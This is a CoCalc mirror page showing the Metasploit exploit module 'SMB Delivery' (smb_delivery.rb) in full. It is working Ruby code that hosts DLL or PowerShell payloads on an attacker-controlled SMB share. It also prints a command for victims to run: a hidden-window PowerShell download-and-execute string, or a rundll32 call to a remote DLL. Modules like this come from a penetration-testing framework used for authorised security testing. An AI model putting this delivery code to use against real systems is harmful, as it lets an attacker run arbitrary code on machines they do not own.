Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/smb/smb_delivery.rb
19758 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::EXE

10
  include Msf::Exploit::Remote::SMB::Server::Share

11
  include Msf::Exploit::Powershell

12


13
  def initialize(info = {})

14
    super(

15
      update_info(

16
        info,

17
        'Name' => "SMB Delivery",

18
        'Description' => %q{

19
          This module serves payloads via an SMB server and provides commands to retrieve

20
          and execute the generated payloads. Currently supports DLLs and Powershell.

21
        },

22
        'License' => MSF_LICENSE,

23
        'Author' => [

24
          'Andrew Smith',

25
          'Russel Van Tuyl'

26
        ],

27
        'References' => [

28
          ['URL', 'https://github.com/rapid7/metasploit-framework/pull/3074']

29
        ],

30
        'Payload' => {

31
          'Space' => 2048,

32
          'DisableNops' => true

33
        },

34
        'Platform' => 'win',

35
        'Targets' => [

36
          [

37
            'DLL', {

38
              'Platform' => 'win',

39
              'Arch' => [ARCH_X86, ARCH_X64]

40
            }

41
          ],

42
          [

43
            'PSH', {

44
              'Platform' => 'win',

45
              'Arch' => [ARCH_X86, ARCH_X64]

46
            }

47
          ]

48
        ],

49
        'Privileged' => false,

50
        'DisclosureDate' => '2016-07-26',

51
        'DefaultTarget' => 0,

52
        'Notes' => {

53
          'Reliability' => UNKNOWN_RELIABILITY,

54
          'Stability' => UNKNOWN_STABILITY,

55
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

56
        }

57
      )

58
    )

59


60
    register_options(

61
      [

62
        OptString.new('FILE_NAME', [ false, 'DLL file name', 'test.dll'])

63
      ]

64
    )

65
  end

66


67
  def primer

68
    print_status('Run the following command on the target machine:')

69
    case target.name

70
    when 'PSH'

71
      self.file_contents = cmd_psh_payload(payload.encoded,

72
                                           payload_instance.arch.first,

73
                                           remove_comspec: true,

74
                                           wrap_double_quotes: true)

75


76
      download_string = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(unc)

77
      download_and_run = "#{ignore_cert}#{download_string}"

78
      print_line generate_psh_command_line(noprofile: true,

79
                                           windowstyle: 'hidden',

80
                                           command: download_and_run)

81
    when 'DLL'

82
      self.file_contents = generate_payload_dll

83
      print_line("rundll32.exe #{unc},0")

84
    end

85
  end

86
end

87


88